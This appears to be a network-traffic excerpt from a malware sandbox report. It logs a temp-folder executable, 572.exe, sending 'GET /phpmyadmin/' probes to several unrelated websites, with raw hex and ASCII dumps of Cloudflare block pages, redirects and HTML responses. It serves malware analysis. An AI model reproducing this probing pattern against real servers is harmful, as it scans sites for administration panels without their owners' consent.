                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:49 UTC1369INData Raw: 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 63 6f 6c 75 6d 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 62 6c 6f 63 6b 65 64 5f 77 68 79 5f 68 65 61 64 6c 69 6e 65 22 3e 57 68 79 20 68 61 76 65 20 49 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 3f 3c 2f 68 32 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 62 6c 6f 63 6b 65 64 5f 77 68 79 5f 64 65 74 61 69 6c 22 3e 54 68 69 73 20 77 65 62 73 69 74 65 20 69 73 20 75 73 69 6e 67 20 61 20 73 65 63 75 72 69 74 79 20 73 65 72 76 69 63 65 20 74 6f 20 70 72 6f 74 65 63 74 20 69 74 73 65 6c 66 20 66 72 6f 6d 20 6f 6e 6c 69 6e 65 20 61 74 74 61 63 6b 73 2e 20 54 68 65 20 61 63 74 69 6f 6e 20 79 6f 75
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <div class="cf-column"> <h2 data-translate="blocked_why_headline">Why have I been blocked?</h2> <p data-translate="blocked_why_detail">This website is using a security service to protect itself from online attacks. The action you
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:49 UTC1066INData Raw: 49 50 3a 0a 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 2d 62 74 6e 22 3e 43 6c 69 63 6b 20 74 6f 20 72 65 76 65 61 6c 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 3e 38 31 2e 31 38 31 2e 35 37 2e 37 34 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: IP: <button type="button" id="cf-footer-ip-reveal" class="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">81.181.57.74</span> <span class="cf-footer-separator sm:hidden">&bull;</span> </span>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                8192.168.2.651433104.26.8.17443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:49 UTC168OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: rage.mp
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:49 UTC1349INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:49 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 12534
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                                                                                                                                                                                                                                Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                                                                                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                                                                                                                                                Cross-Origin-Resource-Policy: same-origin
                                                                                                                                                                                                                                                                                                                                                                Origin-Agent-Cluster: ?1
                                                                                                                                                                                                                                                                                                                                                                Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                                                                                                                                                                                                Referrer-Policy: same-origin
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                cf-mitigated: challenge
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4pInUVDMPwjd%2B201XYHDzYYi8Tdks5fV9N%2FYQ3W3PDnzE5gG8o0NgacAJzguzU1uFkEX%2BhbjNaSM%2FrcWmNbHwwX%2BswVPV5CbMqbqLdWGp6wHkqilKNTfBC8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:49 UTC182INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69 6f 6e 73 3a 20 6e 6f 73 6e 69 66 66 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 35 30 61 62 62 36 35 66 66 66 32 36 37 34 30 2d 41 54 4c 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffServer: cloudflareCF-RAY: 850abb65fff26740-ATLalt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:49 UTC1207INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name="viewp
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:49 UTC1369INData Raw: 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: iIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOT
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:49 UTC1369INData Raw: 72 6b 2d 6d 6f 64 65 3b 7d 26 2e 6c 69 67 68 74 7b 40 69 6e 63 6c 75 64 65 20 6c 69 67 68 74 2d 6d 6f 64 65 3b 7d 7d 61 7b 74 72 61 6e 73 69 74 69 6f 6e 3a 63 6f 6c 6f 72 20 2e 31 35 73 20 65 61 73 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 63 6f 6c 6f 72 3a 23 30 30 35 31 63 33 3b 26 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 63 6f 6c 6f 72 3a 23 65 65 37 33 30 61 7d 7d 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 38 72 65 6d 20 61 75 74 6f 3b 77 69 64 74 68 3a 31 30 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 36 30 72 65 6d 7d 2e 68 65 61 64 69 6e 67 2d 66 61 76 69 63 6f 6e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: rk-mode;}&.light{@include light-mode;}}a{transition:color .15s ease;background-color:transparent;text-decoration:none;color:#0051c3;&:hover{text-decoration:underline;color:#ee730a}}.main-content{margin:8rem auto;width:100%;max-width:60rem}.heading-favicon
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:49 UTC1369INData Raw: 6a 4d 67 4f 53 34 31 61 44 49 75 4e 7a 67 7a 65 6d 30 74 4d 53 34 77 4f 44 51 67 4d 53 34 30 4d 6a 64 78 4c 6a 59 32 49 44 41 67 4d 53 34 77 4e 54 63 75 4d 7a 67 34 4c 6a 51 77 4e 79 34 7a 4f 44 6b 75 4e 44 41 33 4c 6a 6b 35 4e 43 41 77 49 43 34 31 4f 54 59 74 4c 6a 51 77 4e 79 34 35 4f 44 51 74 4c 6a 4d 35 4e 79 34 7a 4f 53 30 78 4c 6a 41 31 4e 79 34 7a 4f 44 6b 74 4c 6a 59 31 49 44 41 74 4d 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: jMgOS41aDIuNzgzem0tMS4wODQgMS40MjdxLjY2IDAgMS4wNTcuMzg4LjQwNy4zODkuNDA3Ljk5NCAwIC41OTYtLjQwNy45ODQtLjM5Ny4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+);background-repeat:no-r
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:49 UTC1369INData Raw: 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 33 36 38 31 3b 63 6f 6c 6f 72 3a 23 66 66 66 7d 7d 2e 66 6f 6f 74 65 72 7b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 31 30 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 36 30 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 32 35 72 65 6d 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 35 72 65 6d 7d 2e 66 6f 6f 74 65 72 2d 69 6e 6e 65 72 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 39 64 39 64 39 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 72 65 6d 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 7b 26 3a 61 66 74 65 72 7b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 63 6f 6e 74 65 6e 74 3a 22 22 7d 2e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ground-color:#003681;color:#fff}}.footer{margin:0 auto;width:100%;max-width:60rem;line-height:1.125rem;font-size:.75rem}.footer-inner{border-top:1px solid #d9d9d9;padding-top:1rem;padding-bottom:1rem}.clearfix{&:after{display:table;clear:both;content:""}.
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:49 UTC1369INData Raw: 2d 6d 73 2d 68 69 67 68 2d 63 6f 6e 74 72 61 73 74 3a 20 6e 6f 6e 65 29 7b 62 6f 64 79 2c 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 33 37 35 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 77 72 61 70 70 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 22 3e 3c 6e 6f 73 63 72 69 70 74 3e 3c 64 69 76 20 69 64 3d 22 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 32
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: -ms-high-contrast: none){body,.main-wrapper{display:block}}</style><meta http-equiv="refresh" content="375"></head><body class="no-js"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div id="challenge-error-title"><div class="h2
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:49 UTC1369INData Raw: 42 36 49 66 75 51 37 47 49 31 4b 63 58 48 4b 68 57 66 52 44 6a 44 47 6c 74 49 63 30 53 34 54 52 70 6e 71 66 6f 47 78 53 6c 49 59 37 6c 35 66 44 54 34 66 57 65 46 49 6a 55 41 42 66 4c 38 6c 64 70 6a 6f 6e 54 47 6f 64 74 6e 4c 4a 4f 52 44 51 50 57 62 71 58 5a 4d 6c 45 53 50 55 36 69 58 5a 77 52 52 52 31 34 6a 56 75 57 50 73 68 57 45 2d 74 61 67 42 67 63 5a 6f 74 78 69 36 62 64 69 72 5a 67 52 5f 6b 79 74 54 4a 46 66 48 70 50 35 49 31 39 63 77 35 59 6a 4c 44 58 4a 31 63 65 2d 34 2d 6c 49 78 61 54 49 33 6b 32 7a 59 49 46 58 77 46 62 64 55 65 6f 39 67 39 77 49 43 33 4a 43 41 4f 53 6d 67 4d 45 2d 38 47 71 5a 4a 34 4f 32 4d 46 66 6a 56 5a 6a 55 7a 30 73 42 77 49 4f 37 77 55 73 4d 66 41 63 4f 66 66 76 5f 6e 4f 72 66 4a 52 37 47 61 4b 68 39 6c 6d 36 2d 43 57 66 6b
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: B6IfuQ7GI1KcXHKhWfRDjDGltIc0S4TRpnqfoGxSlIY7l5fDT4fWeFIjUABfL8ldpjonTGodtnLJORDQPWbqXZMlESPU6iXZwRRR14jVuWPshWE-tagBgcZotxi6bdirZgR_kytTJFfHpP5I19cw5YjLDXJ1ce-4-lIxaTI3k2zYIFXwFbdUeo9g9wIC3JCAOSmgME-8GqZJ4O2MFfjVZjUz0sBwIO7wUsMfAcOffv_nOrfJR7GaKh9lm6-CWfk
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:49 UTC1369INData Raw: 55 66 49 69 51 4e 79 38 72 4f 61 70 53 4e 61 31 30 72 70 56 71 50 71 63 7a 55 54 39 49 56 50 6b 71 79 45 6a 46 53 4f 47 32 63 6c 66 2d 4e 30 37 42 7a 7a 56 38 55 39 48 44 54 73 66 36 4a 5f 6c 43 39 65 46 46 6c 5f 43 30 78 6d 75 56 5a 6d 30 75 69 65 42 6a 51 61 74 74 54 64 74 4d 6d 4f 4d 4a 52 66 5a 39 43 42 6f 6d 61 46 70 46 57 70 46 6c 58 6c 6e 78 4e 58 59 7a 42 70 56 44 75 32 34 62 77 4e 44 4f 68 55 71 6d 32 41 79 67 74 53 43 49 4c 74 53 75 43 77 6a 44 6e 78 66 63 4b 57 48 47 30 55 37 76 50 36 56 77 54 2d 6a 35 42 79 52 67 49 7a 69 66 51 36 68 4a 76 58 4f 56 4e 67 65 56 56 36 47 6c 6f 39 36 2d 74 53 39 35 30 36 75 75 65 37 36 36 78 67 57 64 5f 38 76 6a 33 4e 77 37 73 44 43 4c 79 71 72 44 4d 6d 69 5a 42 78 41 7a 4a 66 6c 45 6e 30 4c 32 2d 67 39 6b 7a 4c
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: UfIiQNy8rOapSNa10rpVqPqczUT9IVPkqyEjFSOG2clf-N07BzzV8U9HDTsf6J_lC9eFFl_C0xmuVZm0uieBjQattTdtMmOMJRfZ9CBomaFpFWpFlXlnxNXYzBpVDu24bwNDOhUqm2AygtSCILtSuCwjDnxfcKWHG0U7vP6VwT-j5ByRgIzifQ6hJvXOVNgeVV6Glo96-tS9506uue766xgWd_8vj3Nw7sDCLyqrDMmiZBxAzJflEn0L2-g9kzL
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:49 UTC1369INData Raw: 70 6b 33 57 45 4a 31 4b 6b 4f 37 44 38 62 73 4d 4e 33 5a 33 35 49 4f 4f 64 75 38 61 38 66 5a 78 68 44 63 42 67 74 4b 48 65 6c 68 42 6e 47 36 75 77 39 79 67 59 55 53 56 69 33 43 73 49 39 53 49 66 64 5a 42 2f 61 4a 49 48 59 2b 4d 34 6d 6d 32 63 73 67 4d 33 6b 71 44 7a 73 43 63 65 62 49 4e 33 79 5a 38 33 51 59 36 59 6d 70 4b 45 31 36 34 77 58 62 6c 58 50 45 50 49 52 50 6b 50 4b 36 71 73 72 79 33 55 31 4c 2f 76 78 42 56 47 35 2b 78 42 69 42 33 4e 63 2b 47 59 42 4b 65 32 6e 67 30 53 4a 33 31 30 31 39 33 71 63 52 6c 51 58 38 76 31 51 6a 64 4c 63 4b 76 43 65 57 59 6d 44 37 30 7a 73 75 78 4c 52 35 61 35 6e 4f 4c 42 69 46 34 6c 46 61 78 73 33 6f 79 53 5a 75 5a 6d 42 65 5a 46 62 42 54 78 7a 78 57 58 64 43 68 52 62 71 5a 44 67 72 31 63 34 49 70 6b 72 6e 55 73 54 43
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: pk3WEJ1KkO7D8bsMN3Z35IOOdu8a8fZxhDcBgtKHelhBnG6uw9ygYUSVi3CsI9SIfdZB/aJIHY+M4mm2csgM3kqDzsCcebIN3yZ83QY6YmpKE164wXblXPEPIRPkPK6qsry3U1L/vxBVG5+xBiB3Nc+GYBKe2ng0SJ310193qcRlQX8v1QjdLcKvCeWYmD70zsuxLR5a5nOLBiF4lFaxs3oySZuZmBeZFbBTxzxWXdChRbqZDgr1c4IpkrnUsTC


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                9192.168.2.651369104.21.5.25443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:49 UTC175OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: opsu.terna.net
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:50 UTC660INHTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:49 GMT
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://terna.net
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OZS7uHuZpCeL0HcXXRsmAKLx0pdRNmzPDiNoEFvx19uGweL4l5NkGPMxS5r14WmAtfFfyhKJzhyX0nFkr1qmCZ1jV6oy4Wi9q7FAUzo09sefrZ%2FHP18jemDhKlqt5P25mA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb66298b1d64-ATL
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                10192.168.2.651416104.17.62.50443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:49 UTC180OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.faceit.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:50 UTC978INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                last-modified: Mon, 05 Feb 2024 10:47:27 GMT
                                                                                                                                                                                                                                                                                                                                                                vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                x-content-type-options: nosniff
                                                                                                                                                                                                                                                                                                                                                                content-security-policy: frame-ancestors 'self' https://*.faceit.com:* https://*.faceit-stage.com:* https://*.faceit-dev.com:* https://*.faceit-sandbox.com:*
                                                                                                                                                                                                                                                                                                                                                                via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: __cf_bm=c3SozpZDJw.b3DlBMcN7Hkn5MPCoHOPNIwpmcQzQ48A-1707131690-1-AdwWkgP73bwM2uLGAPp4na1Jq8SGvEUiGb6Sq8WuE515/RkpxI+avNLNXOyIDHdqB2kMhZ0hqhbTdl9+hRS6DPmY677d60obNbyARbSPvrSM; path=/; expires=Mon, 05-Feb-24 11:44:50 GMT; domain=.faceit.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: _cfuvid=efJjpgaDxK1L9LuAiydeq04prWQsUEOdouYycIVU3L8-1707131690009-0-604800000; path=/; domain=.faceit.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb663cd2452d-ATL
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:50 UTC391INData Raw: 38 61 39 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 66 72 6f 6e 74 65 6e 64 2e 66 61 63 65 69 74 2d 63 64 6e 2e 6e 65 74 2f 66 61 63 65 69 74 2d 63 6f 6e 6e 65 63 74 2f 73 74 61 74 69 63 2f 6a 73 2f 72 75 6e 74 69 6d 65 7e 6d 61 69 6e 2e 37 38 61 35 33 30 32 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 66 72 6f 6e 74 65 6e 64 2e 66 61 63 65 69 74 2d 63 64 6e 2e 6e 65 74 2f 66 61 63 65 69 74 2d 63 6f 6e 6e 65 63 74 2f 73 74 61 74 69 63 2f 6a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 8a9<!doctype html><html lang="en"><head><script defer="defer" src="https://cdn-frontend.faceit-cdn.net/faceit-connect/static/js/runtime~main.78a5302e.min.js"></script><script defer="defer" src="https://cdn-frontend.faceit-cdn.net/faceit-connect/static/j
